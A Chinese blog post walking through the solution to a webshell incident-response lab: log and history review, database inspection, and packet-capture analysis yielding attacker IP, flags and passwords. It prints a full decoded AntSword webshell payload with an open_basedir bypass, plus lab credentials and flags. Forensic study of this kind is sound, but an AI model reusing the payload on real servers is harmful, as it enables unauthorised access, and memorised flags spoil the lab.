点击蓝字 关注我们

添加星标不迷路

由于公众号推送规则改变，微信头条公众号信息会被折叠，为了避免错过公众号推送，请大家动动手指设置“星标”，设置之后就可以和从前一样收到推送啦

题目

前景需要：看监控的时候发现webshell告警，领导让你上机检查你可以救救安服仔吗！！

挑战内容

1,提交攻击者IP

2,提交攻击者修改的管理员密码(明文)

3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)

3,提交Webshell连接密码

4,提交数据包的flag1

5,提交攻击者使用的后续上传的木马文件名称

6,提交攻击者隐藏的flag2

7,提交攻击者隐藏的flag3

相关账户密码

root/Inch@957821.

关于解题

root下,运行"./wp"即可

下载地址

百度网盘链接：https://pan.baidu.com/s/1dZ6TXgLsOiP95oOWyi11wA?pwd=mapi

解题

这里建议大家用xshell解题

首先查看历史命令

可以得到的信息：首先关闭了防火墙而且删除了flag1和flag2还有一个version.php得到了一个flag3以及修改了alinotify.php和mpnotify.php然后我们继续往下看

题目为查看webshell告警了希望我们帮他分析那我们去分析web日志/var/www

我们去看127.0.0.1.log有哪些东西

发现了192.168.20.1这哥们在捣鬼而且发现了可疑的version2.php文件然后继续找

攻击者修改的管理员密码(明文)

我们查看本机开放了哪些端口

netstat -anp

发现3306mysql现在我们得登录上数据库才可以知道被修改的管理员密码

之前我们发现www/wwwlog目录下面有access.log

可以确定为phpmyadmin直接去找配置文件在/www/wwwroot/127.0.0.1/lib目录下config.inc.php

得到数据库账号密码：kaoshi: 5Sx8mK5ieyLPb84m

登录在kaoshi库中的x2_user_group中发现管理员在x2_user中发现被修改的密码

加密密码为：f6f6eb5ace977d7e114377cc7098b7e3

明文密码为：Network@2020(各位师傅们自行解密即可)

flag1

这有一个名为数据包的文件我们把它放在wireshark中打开我们将数据包下载下来放在我们本地的wireshark中

靶机利用python2开启http服务传到本地

systemctl status firewalld

systemctl stop firewalld

python --version

ip a

python -m SimpleHTTPServer

在本地打开发现192.168.20.1这哥们基本确定了他就是攻击者

利用http and ip.src=192.168.20.1检索发现flag1

追踪数据流发现flag

flag1{Network@_2020_Hack}

第一次连接webshell的url及木马文件

通过分析数据包发现url及木马文件

index.php?user-app-register

version2.php

webshell连接密码

通过数据包发现webshell加密流量

进行url解码发现php代码只有蚁剑才会明文传输确定为蚁剑流量且密码为Network2020

Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.fd491f470fb7";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return $out;
}
;
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "4a0c"."dc70";
echo @asenc($output);
echo "db6"."da5";
}
ob_start();
try {
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}";
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
} else {
$R.="/";
}
$R.="";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="{$s}";
echo $R;
;
}
catch(Exception $e) {
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

flag2

我们通过history命令可以看到这哥们做贼心虚把version2.php删了对.api文件夹做了手脚还修改了alinotify.php文件我们用diff命令对比

diff

找到flag2

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

总结

1.攻击者192.168.20.1通过/index.php?user-app-register上传了一个webshell

2.通过蚁剑连接之后在上传version2.php提权

3.修改数据库密码

4.提权之后关闭了防火墙，并且删除提权文件version2.php和falg1且修改了alinotify.php文件